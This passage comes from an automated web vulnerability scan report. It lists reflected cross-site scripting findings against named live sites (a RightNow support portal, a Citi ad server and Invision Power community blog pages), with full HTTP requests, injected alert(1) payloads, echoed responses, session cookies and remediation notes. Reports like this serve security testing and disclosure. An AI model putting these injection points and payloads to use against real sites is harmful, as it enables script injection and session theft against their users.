Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:43 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUgQICmvl2w6Zo2Xi_Jx0N0VgOcbGCC8QFItCAw06VgCz3Mt4%7EGAGfyU2M%7EjB2xMg5ggHpohXV5l5rqv0jWjfN%7EJ%7E72QklUZuENaYBg1WZ4GK77t_VnZJ9ePgqpdt5qpmFeuVSPOvtFdMPJ16uULvibY1%7EVSLYegwJMunUEB4cMQWgeozPB1RX4bpdRmJfNGNYSMipIi5%7ELSfhHdeViZe0S5UhkGq95Iv1vFhIT1B7QKMrn3gv7A%7EiAr7QuieTdfnGa4tw8OQ1cUu8geqVTV4DvFNfsS4YL%7E4vTYnBb8lxnsVeT%7EC5MhQgL0Boz096TdGlDBIUF18UGjd55MRhW9CHmDXXNObd_wZ%7E; path=/; httponly
Content-Length: 25622
RNT-Time: D=131773 t=1296691423739902
RNT-Machine: 07
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT
...[SNIP]...

3.15. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c521</script><a>a4238952955 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:48 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUl5Nj4RPJmKrK0ec4KoYcZ74WET9xduFZF8XJhcIYWFDJvt8YVPg5PiixPRy5Sn%7Ehiidpu8t9H6PgtJWmiJjeDFhqdz2g4M6rZvKVoR3cwoU%7EA3cXzprLyv6lvudmE_MqxYdg0wnBtp0VjGBkouhpp2g8RrZCMvI7C8uRKHyHdrhjYuH3jeP_vuoouEl7b4xlfWmNRvdchpWhQ9wzT4Bz4fIiibRbgmiM; path=/; httponly
Content-Length: 25600
RNT-Time: D=113558 t=1296691428704362
RNT-Machine: 03
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEMO
...[SNIP]...

3.16. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f27fe%3balert(1)//63b819cf766 was submitted in the BT_PID parameter. This input was echoed as f27fe;alert(1)//63b819cf766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=285777f27fe%3balert(1)//63b819cf766&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 22:01:37 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ATV1=43499dU6T3Hc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701370249&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ASB1=TX=1296684097&Pb=0&A=8&SID=077E13A179464CC6B65ADCF24D55BF62&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=2B636B63D42641EFBEA212DDAB2EF869; path=/
Date: Wed, 02 Feb 2011 22:01:37 GMT
Connection: close
Content-Length: 2725

var bt_ad_content285777f27fe;alert(1)//63b819cf766=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack.com.edgesuite.net/asset
...[SNIP]...

3.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc3b"%3balert(1)//132759f788 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9dc3b";alert(1)//132759f788 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com&9dc3b"%3balert(1)//132759f788=1 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 22:01:48 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB9=TX=1296684109&Pb=0&A=8&SID=DD8583ED0D2F43239CBC136CC3E1C6DE&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79292&Cr=98462&W=41062&Tr=41062&Cp=4112&P=285777&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701480650&S2=98462z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ATV9=33820dU6T3Tc1c40Gc8N2Hccc304Uc2DDScc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=4E30CB4C3E0A4790B2D6A833F5FD8992; path=/
Date: Wed, 02 Feb 2011 22:01:47 GMT
Connection: close
Content-Length: 2739

var bt_ad_content285777=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...
net/assets/98459/CITI_PlatVCR_SpecialOffer_688x153_18m_jan11.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=249747&BT_SID=101521&_u=visitor&9dc3b";alert(1)//132759f788=1&_d=http%3A%2F%2Fwww%2Eciti%2Ecom";var lf="lid=&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D249747%26BT%5FSID%3D101521%26%5Fu%3Dvisitor%269dc3b%22%3Balert
...[SNIP]...

3.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b66"-alert(1)-"9daffae2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:45 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8db8318b3aec88529bd6bbe8faa4161d; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:47 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:51 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNrOwrgVcMFxcqQat; expires=Thu, 02-Feb-2012 23:12:51 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85e9a'><script>alert(1)</script>5b968c91723 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c1d2fc6ab0b28cb830f386445ab8cff6; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:24 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:28 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNjG1rgVcMFxcmAao; expires=Thu, 02-Feb-2012 23:12:28 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1&amp;_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'>
...[SNIP]...

3.20. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8785"-alert(1)-"f79d44465d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:16:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ae8dc79f24404a880282c7bbf5b19e4b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:16:12 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:16:15 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNTe2rgVcMFxcqAar; expires=Thu, 02-Feb-2012 23:16:15 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 122180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.21. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfadb'><script>alert(1)</script>b8e6b27f29e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:15:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=0bbc7478bd0028f532aea9869f768f0c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:15:42 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:15:46 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNTG2rgVcMFxcnAao; expires=Thu, 02-Feb-2012 23:15:46 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e?_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'>
...[SNIP]...

3.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7c05"-alert(1)-"4172e4c7f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:10:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=6d6d1d1b3d63548ae301ccd0f4821244; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:10:06 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:10:09 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwMjCzrgVcMFxcVwah; expires=Thu, 02-Feb-2012 23:10:09 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1";
       ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a214f'><script>alert(1)</script>6b477eb9bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:09:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=bb0286ec98b780009858344a28ff45a6; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:09:43 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwtDC2rgVcMFxcaQal; expires=Thu, 02-Feb-2012 23:09:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1&amp;_rcid=11570#fastreply' title="Reply directly to this post" id='reply_comment_11570' class='reply_comment'>
...[SNIP]...

